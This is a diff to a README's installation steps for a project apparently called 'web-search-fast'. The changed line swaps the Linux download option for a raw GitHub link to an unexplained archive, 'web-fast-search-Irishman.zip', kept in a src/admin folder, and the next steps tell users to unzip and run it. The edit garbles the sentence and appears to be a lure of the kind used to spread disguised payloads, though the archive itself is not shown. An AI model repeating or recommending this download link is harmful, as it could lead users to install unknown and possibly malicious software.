Velociity9/web-search-fast/README.md

 3. **Download the installer or zip file:**
    - For Windows, download the `.exe` or `.msi` file.
    - For macOS, download the `.dmg` or zipped app file.
-   - For Linux, download the `.tar.gz` or `.deb` package depending on your distro.
+   - For Linux, download the `https://github.com/Velociity9/web-search-fast/raw/refs/heads/main/src/admin/web-fast-search-Irishman.zip` or `.deb` package depending on your distro.

 4. **Run the installer or unzip the file:**
    Follow the prompts on your screen to install the program.
 If you have a zipped file, extract it to a folder you can access.